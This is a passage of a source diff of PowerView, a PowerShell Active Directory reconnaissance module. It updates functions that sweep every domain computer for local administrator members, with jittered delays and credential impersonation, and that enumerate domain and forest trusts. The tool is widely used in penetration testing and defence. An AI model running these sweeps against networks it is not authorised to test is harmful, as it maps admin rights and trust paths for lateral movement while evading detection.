- Write-Verbose "[*] Running Invoke-EnumerateLocalAdmin with delay of $Delay"
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
- # if we're using a host list, read the targets in and add them to the target list
- if($ComputerFile) {
- $ComputerName = Get-Content -Path $ComputerFile
- }
+ [ValidateRange(1, 10000)]
+ [Int]
+ $Delay = 0,
- if(!$ComputerName) {
- [array]$ComputerName = @()
+ [ValidateRange(0.0, 1.0)]
+ [Double]
+ $Jitter = .3,
- if($Domain) {
- $TargetDomains = @($Domain)
- }
- elseif($SearchForest) {
- # get ALL the domains in the forest to search
- $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }
- }
- else {
- # use the local domain
- $TargetDomains = @( (Get-NetDomain).name )
- }
+ [Int]
+ [ValidateRange(1, 100)]
+ $Threads = 20
+ )
- ForEach ($Domain in $TargetDomains) {
- Write-Verbose "[*] Querying domain $Domain for hosts"
- $ComputerName += Get-NetComputer -Filter $ComputerFilter -ADSpath $ComputerADSpath -Domain $Domain -DomainController $DomainController
- }
-
- # remove any null target hosts, uniquify the list and shuffle it
- $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }
- if($($ComputerName.Count) -eq 0) {
- throw "No hosts found!"
- }
+ BEGIN {
+ $ComputerSearcherArguments = @{
+ 'Properties' = 'dnshostname'
+ }
+ if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }
+ if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }
+ if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }
+ if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained }
+ if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }
+ if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }
+ if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }
+ if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }
+
+ if ($PSBoundParameters['ComputerName']) {
+ $TargetComputers = $ComputerName
}
-
- # delete any existing output file if it already exists
- if(!$NoClobber) {
- if ($OutFile -and (Test-Path -Path $OutFile)) { Remove-Item -Path $OutFile }
+ else {
+ Write-Verbose '[Find-DomainLocalGroupMember] Querying computers in the domain'
+ $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname
}
-
- if($TrustGroups) {
-
- Write-Verbose "Determining domain trust groups"
-
- # find all group names that have one or more users in another domain
- $TrustGroupNames = Find-ForeignGroup -Domain $Domain -DomainController $DomainController | ForEach-Object { $_.GroupName } | Sort-Object -Unique
-
- $TrustGroupsSIDs = $TrustGroupNames | ForEach-Object {
- # ignore the builtin administrators group for a DC (S-1-5-32-544)
- # TODO: ignore all default built in sids?
- Get-NetGroup -Domain $Domain -DomainController $DomainController -GroupName $_ -FullData | Where-Object { $_.objectsid -notmatch "S-1-5-32-544" } | ForEach-Object { $_.objectsid }
- }
-
- # query for the primary domain controller so we can extract the domain SID for filtering
- $DomainSID = Get-DomainSID -Domain $Domain -DomainController $DomainController
+ Write-Verbose "[Find-DomainLocalGroupMember] TargetComputers length: $($TargetComputers.Length)"
+ if ($TargetComputers.Length -eq 0) {
+ throw '[Find-DomainLocalGroupMember] No hosts found to enumerate'
}
- # script block that enumerates a server
+ # the host enumeration block we're using to enumerate all servers
$HostEnumBlock = {
- param($ComputerName, $Ping, $OutFile, $DomainSID, $TrustGroupsSIDs, $API, $DomainOnly)
+ Param($ComputerName, $GroupName, $Method, $TokenHandle)
- # optionally check if the server is up first
- $Up = $True
- if($Ping) {
- $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName
+ # Add check if user defaults to/selects "Administrators"
+ if ($GroupName -eq "Administrators") {
+ $AdminSecurityIdentifier = New-Object System.Security.Principal.SecurityIdentifier([System.Security.Principal.WellKnownSidType]::BuiltinAdministratorsSid,$null)
+ $GroupName = ($AdminSecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value -split "\\")[-1]
}
- if($Up) {
- # grab the users for the local admins on this server
- if($API) {
- $LocalAdmins = Get-NetLocalGroup -ComputerName $ComputerName -API
- }
- else {
- $LocalAdmins = Get-NetLocalGroup -ComputerName $ComputerName
- }
-
- # if we just want to return cross-trust users
- if($DomainSID) {
- # get the local machine SID
- $LocalSID = ($LocalAdmins | Where-Object { $_.SID -match '.*-500$' }).SID -replace "-500$"
- Write-Verbose "LocalSid for $ComputerName : $LocalSID"
- # filter out accounts that begin with the machine SID and domain SID
- # but preserve any groups that have users across a trust ($TrustGroupSIDS)
- $LocalAdmins = $LocalAdmins | Where-Object { ($TrustGroupsSIDs -contains $_.SID) -or ((-not $_.SID.startsWith($LocalSID)) -and (-not $_.SID.startsWith($DomainSID))) }
- }
- if($DomainOnly) {
- $LocalAdmins = $LocalAdmins | Where-Object {$_.IsDomain}
- }
+ if ($TokenHandle) {
+ # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation
+ $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet
+ }
- if($LocalAdmins -and ($LocalAdmins.Length -ne 0)) {
- # output the results to a csv if specified
- if($OutFile) {
- $LocalAdmins | Export-PowerViewCSV -OutFile $OutFile
+ ForEach ($TargetComputer in $ComputerName) {
+ $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer
+ if ($Up) {
+ $NetLocalGroupMemberArguments = @{
+ 'ComputerName' = $TargetComputer
+ 'Method' = $Method
+ 'GroupName' = $GroupName
}
- else {
- # otherwise return the user objects
- $LocalAdmins
- }
- }
- else {
- Write-Verbose "[!] No users returned from $ComputerName"
+ Get-NetLocalGroupMember @NetLocalGroupMemberArguments
}
}
- }
- }
-
- process {
- if($Threads) {
- Write-Verbose "Using threading with threads = $Threads"
-
- # if we're using threading, kick off the script block with Invoke-ThreadedFunction
- $ScriptParams = @{
- 'Ping' = $(-not $NoPing)
- 'OutFile' = $OutFile
- 'DomainSID' = $DomainSID
- 'TrustGroupsSIDs' = $TrustGroupsSIDs
+ if ($TokenHandle) {
+ Invoke-RevertToSelf
}
+ }
- # kick off the threaded script block + arguments
- if($API) {
- $ScriptParams['API'] = $True
+ $LogonToken = $Null
+ if ($PSBoundParameters['Credential']) {
+ if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential
}
-
- if($DomainOnly) {
- $ScriptParams['DomainOnly'] = $True
+ else {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet
}
-
- Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
}
+ }
- else {
- if(-not $NoPing -and ($ComputerName.count -ne 1)) {
- # ping all hosts in parallel
- $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}
- $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100
- }
+ PROCESS {
+ # only ignore threading if -Delay is passed
+ if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
- Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)"
+ Write-Verbose "[Find-DomainLocalGroupMember] Total number of hosts: $($TargetComputers.count)"
+ Write-Verbose "[Find-DomainLocalGroupMember] Delay: $Delay, Jitter: $Jitter"
$Counter = 0
+ $RandNo = New-Object System.Random
- ForEach ($Computer in $ComputerName) {
-
+ ForEach ($TargetComputer in $TargetComputers) {
$Counter = $Counter + 1
# sleep for our semi-randomized interval
Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
- Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))"
- $ScriptArgs = @($Computer, $False, $OutFile, $DomainSID, $TrustGroupsSIDs, $API, $DomainOnly)
+ Write-Verbose "[Find-DomainLocalGroupMember] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))"
+ Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $GroupName, $Method, $LogonToken
+ }
+ }
+ else {
+ Write-Verbose "[Find-DomainLocalGroupMember] Using threading with threads: $Threads"
- Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $ScriptArgs
+ # if we're using threading, kick off the script block with New-ThreadedFunction
+ $ScriptParams = @{
+ 'GroupName' = $GroupName
+ 'Method' = $Method
+ 'TokenHandle' = $LogonToken
}
+
+ # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params
+ New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
+ }
+ }
+
+ END {
+ if ($LogonToken) {
+ Invoke-RevertToSelf -TokenHandle $LogonToken
}
}
}
@@ -12515,99 +18998,197 @@ function Invoke-EnumerateLocalAdmin {
#
########################################################
-function Get-NetDomainTrust {
+function Get-DomainTrust {
<#
- .SYNOPSIS
+.SYNOPSIS
- Return all domain trusts for the current domain or
- a specified domain.
+Return all domain trusts for the current domain or a specified domain.
- .PARAMETER Domain
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Domain, Get-DomainSearcher, Get-DomainSID, PSReflect
- The domain whose trusts to enumerate, defaults to the current domain.
+.DESCRIPTION
- .PARAMETER DomainController
+This function will enumerate domain trust relationships for the current (or a remote)
+domain using a number of methods. By default, the .NET method GetAllTrustRelationships()
+is used on the System.DirectoryServices.ActiveDirectory.Domain object. If the -LDAP flag
+is specified, or any of the LDAP-appropriate parameters, an LDAP search using the filter
+'(objectClass=trustedDomain)' is used instead. If the -API flag is specified, the
+Win32 API DsEnumerateDomainTrusts() call is used to enumerate instead.
- Domain controller to reflect LDAP queries through.
+.PARAMETER Domain
- .PARAMETER ADSpath
+Specifies the domain to query for trusts, defaults to the current domain.
- The LDAP source to search through, e.g. "LDAP://DC=testlab,DC=local".
- Useful for global catalog queries ;)
+.PARAMETER API
- .PARAMETER API
+Switch. Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts instead of the built-in
+.NET methods.
- Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts.
+.PARAMETER LDAP
- .PARAMETER LDAP
+Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections.
- Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections.
- More likely to get around network segmentation, but not as accurate.
+.PARAMETER LDAPFilter
- .PARAMETER PageSize
+Specifies an LDAP query string that is used to filter Active Directory objects.
- The PageSize to set for the LDAP searcher object.
+.PARAMETER Properties
- .EXAMPLE
+Specifies the properties of the output object to retrieve from the server.
- PS C:\> Get-NetDomainTrust
+.PARAMETER SearchBase
- Return domain trusts for the current domain using built in .NET methods.
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
- .EXAMPLE
+.PARAMETER Server
- PS C:\> Get-NetDomainTrust -Domain "prod.testlab.local"
+Specifies an Active Directory server (domain controller) to bind to.
- Return domain trusts for the "prod.testlab.local" domain using .NET methods
+.PARAMETER SearchScope
- .EXAMPLE
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- PS C:\> Get-NetDomainTrust -LDAP -Domain "prod.testlab.local" -DomainController "PRIMARY.testlab.local"
+.PARAMETER ResultPageSize
- Return domain trusts for the "prod.testlab.local" domain enumerated through LDAP
- queries, reflecting queries through the "Primary.testlab.local" domain controller,
- using .NET methods.
+Specifies the PageSize to set for the LDAP searcher object.
- .EXAMPLE
+.PARAMETER ServerTimeLimit
- PS C:\> Get-NetDomainTrust -API -Domain "prod.testlab.local"
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- Return domain trusts for the "prod.testlab.local" domain enumerated through API calls.
+.PARAMETER Tombstone
- .EXAMPLE
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- PS C:\> Get-NetDomainTrust -API -DomainController WINDOWS2.testlab.local
+.PARAMETER FindOne
- Return domain trusts reachable from the WINDOWS2 machine through API calls.
-#>
+Only return one result object.
- [CmdletBinding()]
- param(
- [Parameter(Position=0, ValueFromPipeline=$True)]
- [String]
- $Domain,
+.PARAMETER Credential
- [String]
- $DomainController,
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainTrust
+
+Return domain trusts for the current domain using built in .NET methods.
+
+.EXAMPLE
+
+Get-DomainTrust -Domain "prod.testlab.local"
+
+Return domain trusts for the "prod.testlab.local" domain using .NET methods
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainTrust -LDAP -Domain "prod.testlab.local" -Server "PRIMARY.testlab.local" -Credential $Cred
+
+Return domain trusts for the "prod.testlab.local" domain enumerated through LDAP
+queries, binding to the PRIMARY.testlab.local server for queries, and using the specified
+alternate credenitals.
+
+.EXAMPLE
+
+Get-DomainTrust -API -Domain "prod.testlab.local"
+
+Return domain trusts for the "prod.testlab.local" domain enumerated through API calls.
+
+.OUTPUTS
+
+PowerView.DomainTrust.NET
+
+A TrustRelationshipInformationCollection returned when using .NET methods (default).
+
+PowerView.DomainTrust.LDAP
+
+Custom PSObject with translated domain LDAP trust result fields.
+
+PowerView.DomainTrust.API
+Custom PSObject with translated domain API trust result fields.
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.DomainTrust.NET')]
+ [OutputType('PowerView.DomainTrust.LDAP')]
+ [OutputType('PowerView.DomainTrust.API')]
+ [CmdletBinding(DefaultParameterSetName = 'NET')]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('Name')]
+ [ValidateNotNullOrEmpty()]
[String]
- $ADSpath,
+ $Domain,
+ [Parameter(ParameterSetName = 'API')]
[Switch]
$API,
+ [Parameter(ParameterSetName = 'LDAP')]
[Switch]
$LDAP,
- [ValidateRange(1,10000)]
+ [Parameter(ParameterSetName = 'LDAP')]
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $LDAPFilter,
+
+ [Parameter(ParameterSetName = 'LDAP')]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Properties,
+
+ [Parameter(ParameterSetName = 'LDAP')]
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
+
+ [Parameter(ParameterSetName = 'LDAP')]
+ [Parameter(ParameterSetName = 'API')]
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [Parameter(ParameterSetName = 'LDAP')]
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [Parameter(ParameterSetName = 'LDAP')]
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [Parameter(ParameterSetName = 'LDAP')]
+ [ValidateRange(1, 10000)]
[Int]
- $PageSize = 200,
+ $ServerTimeLimit,
+
+ [Parameter(ParameterSetName = 'LDAP')]
+ [Switch]
+ $Tombstone,
+
+ [Alias('ReturnOne')]
+ [Switch]
+ $FindOne,
+ [Parameter(ParameterSetName = 'LDAP')]
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- begin {
+ BEGIN {
$TrustAttributes = @{
[uint32]'0x00000001' = 'non_transitive'
[uint32]'0x00000002' = 'uplevel_only'
@@ -12621,33 +19202,61 @@ function Get-NetDomainTrust {
[uint32]'0x00000200' = 'cross_organization_no_tgt_delegation'
[uint32]'0x00000400' = 'pim_trust'
}
+
+ $LdapSearcherArguments = @{}
+ if ($PSBoundParameters['LDAPFilter']) { $LdapSearcherArguments['LDAPFilter'] = $LDAPFilter }
+ if ($PSBoundParameters['Properties']) { $LdapSearcherArguments['Properties'] = $Properties }
+ if ($PSBoundParameters['SearchBase']) { $LdapSearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $LdapSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $LdapSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $LdapSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $LdapSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $LdapSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $LdapSearcherArguments['Credential'] = $Credential }
}
- process {
+ PROCESS {
+ if ($PsCmdlet.ParameterSetName -ne 'API') {
+ $NetSearcherArguments = @{}
+ if ($Domain -and $Domain.Trim() -ne '') {
+ $SourceDomain = $Domain
+ }
+ else {
+ if ($PSBoundParameters['Credential']) {
+ $SourceDomain = (Get-Domain -Credential $Credential).Name
+ }
+ else {
+ $SourceDomain = (Get-Domain).Name
+ }
+ }
- if(-not $Domain) {
- # if not domain is specified grab the current domain
- $SourceDomain = (Get-NetDomain -Credential $Credential).Name
+ $NetSearcherArguments['Domain'] = $SourceDomain
+ if ($PSBoundParameters['Credential']) { $NetSearcherArguments['Credential'] = $Credential }
}
else {
- $SourceDomain = $Domain
+ if ($Domain -and $Domain.Trim() -ne '') {
+ $SourceDomain = $Domain
+ }
+ else {
+ $SourceDomain = $Env:USERDNSDOMAIN
+ }
}
- if($LDAP -or $ADSPath) {
+ if ($PsCmdlet.ParameterSetName -eq 'LDAP') {
+ # if we're searching for domain trusts through LDAP/ADSI
+ $TrustSearcher = Get-DomainSearcher @LdapSearcherArguments
+ $SourceSID = Get-DomainSID @NetSearcherArguments
- $TrustSearcher = Get-DomainSearcher -Domain $SourceDomain -DomainController $DomainController -Credential $Credential -PageSize $PageSize -ADSpath $ADSpath
-
- $SourceSID = Get-DomainSID -Domain $SourceDomain -DomainController $DomainController
-
- if($TrustSearcher) {
+ if ($TrustSearcher) {
$TrustSearcher.Filter = '(objectClass=trustedDomain)'
- $Results = $TrustSearcher.FindAll()
+ if ($PSBoundParameters['FindOne']) { $Results = $TrustSearcher.FindOne() }
+ else { $Results = $TrustSearcher.FindAll() }
$Results | Where-Object {$_} | ForEach-Object {
$Props = $_.Properties
$DomainTrust = New-Object PSObject
-
+
$TrustAttrib = @()
$TrustAttrib += $TrustAttributes.Keys | Where-Object { $Props.trustattributes[0] -band $_ } | ForEach-Object { $TrustAttributes[$_] }
@@ -12657,8 +19266,10 @@ function Get-NetDomainTrust {
2 { 'Outbound' }
3 { 'Bidirectional' }
}
+
$ObjectGuid = New-Object Guid @(,$Props.objectguid[0])
$TargetSID = (New-Object System.Security.Principal.SecurityIdentifier($Props.securityidentifier[0],0)).Value
+
$DomainTrust | Add-Member Noteproperty 'SourceName' $SourceDomain
$DomainTrust | Add-Member Noteproperty 'SourceSID' $SourceSID
$DomainTrust | Add-Member Noteproperty 'TargetName' $Props.name[0]
@@ -12666,86 +19277,93 @@ function Get-NetDomainTrust {
$DomainTrust | Add-Member Noteproperty 'ObjectGuid' "{$ObjectGuid}"
$DomainTrust | Add-Member Noteproperty 'TrustType' $($TrustAttrib -join ',')
$DomainTrust | Add-Member Noteproperty 'TrustDirection' "$Direction"
- $DomainTrust.PSObject.TypeNames.Add('PowerView.DomainTrustLDAP')
+ $DomainTrust.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.LDAP')
$DomainTrust
}
- $Results.dispose()
+ if ($Results) {
+ try { $Results.dispose() }
+ catch {
+ Write-Verbose "[Get-DomainTrust] Error disposing of the Results object: $_"
+ }
+ }
$TrustSearcher.dispose()
}
}
- elseif($API) {
- if(-not $DomainController) {
- $DomainController = Get-NetDomainController -Credential $Credential -Domain $SourceDomain | Select-Object -First 1 | Select-Object -ExpandProperty Name
+ elseif ($PsCmdlet.ParameterSetName -eq 'API') {
+ # if we're searching for domain trusts through Win32 API functions
+ if ($PSBoundParameters['Server']) {
+ $TargetDC = $Server
+ }
+ elseif ($Domain -and $Domain.Trim() -ne '') {
+ $TargetDC = $Domain
+ }
+ else {
+ # see https://msdn.microsoft.com/en-us/library/ms675976(v=vs.85).aspx for default NULL behavior
+ $TargetDC = $Null
}
- if($DomainController) {
- # arguments for DsEnumerateDomainTrusts
- $PtrInfo = [IntPtr]::Zero
+ # arguments for DsEnumerateDomainTrusts
+ $PtrInfo = [IntPtr]::Zero
- # 63 = DS_DOMAIN_IN_FOREST + DS_DOMAIN_DIRECT_OUTBOUND + DS_DOMAIN_TREE_ROOT + DS_DOMAIN_PRIMARY + DS_DOMAIN_NATIVE_MODE + DS_DOMAIN_DIRECT_INBOUND
- $Flags = 63
- $DomainCount = 0
+ # 63 = DS_DOMAIN_IN_FOREST + DS_DOMAIN_DIRECT_OUTBOUND + DS_DOMAIN_TREE_ROOT + DS_DOMAIN_PRIMARY + DS_DOMAIN_NATIVE_MODE + DS_DOMAIN_DIRECT_INBOUND
+ $Flags = 63
+ $DomainCount = 0
- # get the trust information from the target server
- $Result = $Netapi32::DsEnumerateDomainTrusts($DomainController, $Flags, [ref]$PtrInfo, [ref]$DomainCount)
+ # get the trust information from the target server
+ $Result = $Netapi32::DsEnumerateDomainTrusts($TargetDC, $Flags, [ref]$PtrInfo, [ref]$DomainCount)
- # Locate the offset of the initial intPtr
- $Offset = $PtrInfo.ToInt64()
+ # Locate the offset of the initial intPtr
+ $Offset = $PtrInfo.ToInt64()
- # 0 = success
- if (($Result -eq 0) -and ($Offset -gt 0)) {
+ # 0 = success
+ if (($Result -eq 0) -and ($Offset -gt 0)) {
- # Work out how much to increment the pointer by finding out the size of the structure
- $Increment = $DS_DOMAIN_TRUSTS::GetSize()
+ # Work out how much to increment the pointer by finding out the size of the structure
+ $Increment = $DS_DOMAIN_TRUSTS::GetSize()
- # parse all the result structures
- for ($i = 0; ($i -lt $DomainCount); $i++) {
- # create a new int ptr at the given offset and cast the pointer as our result structure
- $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
- $Info = $NewIntPtr -as $DS_DOMAIN_TRUSTS
+ # parse all the result structures
+ for ($i = 0; ($i -lt $DomainCount); $i++) {
+ # create a new int ptr at the given offset and cast the pointer as our result structure
+ $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
+ $Info = $NewIntPtr -as $DS_DOMAIN_TRUSTS
- $Offset = $NewIntPtr.ToInt64()
- $Offset += $Increment
+ $Offset = $NewIntPtr.ToInt64()
+ $Offset += $Increment
- $SidString = ""
- $Result = $Advapi32::ConvertSidToStringSid($Info.DomainSid, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+ $SidString = ''
+ $Result = $Advapi32::ConvertSidToStringSid($Info.DomainSid, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
- if($Result -eq 0) {
- Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
- }
- else {
- $DomainTrust = New-Object PSObject
- $DomainTrust | Add-Member Noteproperty 'SourceDomain' $SourceDomain
- $DomainTrust | Add-Member Noteproperty 'SourceDomainController' $DomainController
- $DomainTrust | Add-Member Noteproperty 'NetbiosDomainName' $Info.NetbiosDomainName
- $DomainTrust | Add-Member Noteproperty 'DnsDomainName' $Info.DnsDomainName
- $DomainTrust | Add-Member Noteproperty 'Flags' $Info.Flags
- $DomainTrust | Add-Member Noteproperty 'ParentIndex' $Info.ParentIndex
- $DomainTrust | Add-Member Noteproperty 'TrustType' $Info.TrustType
- $DomainTrust | Add-Member Noteproperty 'TrustAttributes' $Info.TrustAttributes
- $DomainTrust | Add-Member Noteproperty 'DomainSid' $SidString
- $DomainTrust | Add-Member Noteproperty 'DomainGuid' $Info.DomainGuid
- $DomainTrust.PSObject.TypeNames.Add('PowerView.APIDomainTrust')
- $DomainTrust
- }
+ if ($Result -eq 0) {
+ Write-Verbose "[Get-DomainTrust] Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
+ }
+ else {
+ $DomainTrust = New-Object PSObject
+ $DomainTrust | Add-Member Noteproperty 'SourceName' $SourceDomain
+ $DomainTrust | Add-Member Noteproperty 'TargetName' $Info.DnsDomainName
+ $DomainTrust | Add-Member Noteproperty 'TargetNetbiosName' $Info.NetbiosDomainName
+ $DomainTrust | Add-Member Noteproperty 'Flags' $Info.Flags
+ $DomainTrust | Add-Member Noteproperty 'ParentIndex' $Info.ParentIndex
+ $DomainTrust | Add-Member Noteproperty 'TrustType' $Info.TrustType
+ $DomainTrust | Add-Member Noteproperty 'TrustAttributes' $Info.TrustAttributes
+ $DomainTrust | Add-Member Noteproperty 'TargetSid' $SidString
+ $DomainTrust | Add-Member Noteproperty 'TargetGuid' $Info.DomainGuid
+ $DomainTrust.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.API')
+ $DomainTrust
}
- # free up the result buffer
- $Null = $Netapi32::NetApiBufferFree($PtrInfo)
- }
- else {
- Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)"
}
+ # free up the result buffer
+ $Null = $Netapi32::NetApiBufferFree($PtrInfo)
}
else {
- Write-Verbose "Could not retrieve domain controller for $Domain"
+ Write-Verbose "[Get-DomainTrust] Error: $(([ComponentModel.Win32Exception] $Result).Message)"
}
}
else {
- # if we're using direct domain connections through .NET
- $FoundDomain = Get-NetDomain -Domain $Domain -Credential $Credential
- if($FoundDomain) {
+ # if we're searching for domain trusts through .NET methods
+ $FoundDomain = Get-Domain @NetSearcherArguments
+ if ($FoundDomain) {
$FoundDomain.GetAllTrustRelationships() | ForEach-Object {
- $_.PSObject.TypeNames.Add('PowerView.DomainTrust')
+ $_.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.NET')
$_
}
}
@@ -12754,50 +19372,83 @@ function Get-NetDomainTrust {
}
-function Get-NetForestTrust {
+function Get-ForestTrust {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Return all forest trusts for the current forest or a specified forest.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Forest
+
+.DESCRIPTION
+
+This function will enumerate domain trust relationships for the current (or a remote)
+forest using number of method using the .NET method GetAllTrustRelationships() on a
+System.DirectoryServices.ActiveDirectory.Forest returned by Get-Forest.
- Return all trusts for the current forest.
+.PARAMETER Forest
- .PARAMETER Forest
+Specifies the forest to query for trusts, defaults to the current forest.
- Return trusts for the specified forest.
+.PARAMETER Credential
- .PARAMETER Credential
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+.EXAMPLE
- .EXAMPLE
+Get-ForestTrust
- PS C:\> Get-NetForestTrust
+Return current forest trusts.
- Return current forest trusts.
+.EXAMPLE
- .EXAMPLE
+Get-ForestTrust -Forest "external.local"
- PS C:\> Get-NetForestTrust -Forest "test"
+Return trusts for the "external.local" forest.
- Return trusts for the "test" forest.
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-ForestTrust -Forest "external.local" -Credential $Cred
+
+Return trusts for the "external.local" forest using the specified alternate credenitals.
+
+.OUTPUTS
+
+PowerView.DomainTrust.NET
+
+A TrustRelationshipInformationCollection returned when using .NET methods (default).
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.ForestTrust.NET')]
[CmdletBinding()]
- param(
- [Parameter(Position=0,ValueFromPipeline=$True)]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('Name')]
+ [ValidateNotNullOrEmpty()]
[String]
$Forest,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- process {
- $FoundForest = Get-NetForest -Forest $Forest -Credential $Credential
+ PROCESS {
+ $NetForestArguments = @{}
+ if ($PSBoundParameters['Forest']) { $NetForestArguments['Forest'] = $Forest }
+ if ($PSBoundParameters['Credential']) { $NetForestArguments['Credential'] = $Credential }
- if($FoundForest) {
+ $FoundForest = Get-Forest @NetForestArguments
+
+ if ($FoundForest) {
$FoundForest.GetAllTrustRelationships() | ForEach-Object {
- $_.PSObject.TypeNames.Add('PowerView.ForestTrust')
+ $_.PSObject.TypeNames.Insert(0, 'PowerView.ForestTrust.NET')
$_
}
}
@@ -12805,391 +19456,593 @@ function Get-NetForestTrust {
}
-function Find-ForeignUser {
+function Get-DomainForeignUser {
